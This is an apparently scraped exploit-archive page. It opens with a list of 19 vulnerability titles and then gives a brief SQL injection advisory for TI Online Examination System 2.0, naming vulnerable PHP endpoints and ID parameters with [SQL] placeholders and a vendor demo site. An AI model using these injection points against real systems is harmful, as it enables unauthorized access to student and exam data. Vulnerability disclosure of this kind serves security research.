8b6bfd7f93
19 new exploits Cimetrics BACstac 6.2f - Privilege Escalation Cimetrics BACnet Explorer 4.0 - XML External Entity Injection SonicDICOM PACS 2.3.2 - Cross-Site Scripting SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin) SonicDICOM PACS 2.3.2 - Privilege Escalation Kodi 17.1 - Arbitrary File Disclosure WhizBiz 1.9 - SQL Injection TI Online Examination System 2.0 - SQL Injection Viavi Real Estate - SQL Injection Viavi Movie Review - 'id' Parameter SQL Injection Viavi Product Review - 'id' Parameter SQL Injection Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection Joomla! Component Vik Booking 1.7 - SQL Injection Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection
22 lines
No EOL
789 B
Text
Executable file
22 lines
No EOL
789 B
Text
Executable file
# # # # #
|
|
# Exploit Title: TI Online Examination System v2.0 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 12.02.2017
|
|
# Vendor Homepage: http://textusintentio.com/
|
|
# Software Buy: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
|
|
# Demo: http://oesv2.textusintentio.com/
|
|
# Version: 2.0
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# Login as student user
|
|
# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
|
|
# http://localhost/[PATH]/center/student_edit.php?s_id=[SQL]
|
|
# http://localhost/[PATH]/center/edit_notice.php?n_id=[SQL]
|
|
# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
|
|
# Etc..
|
|
# # # # # |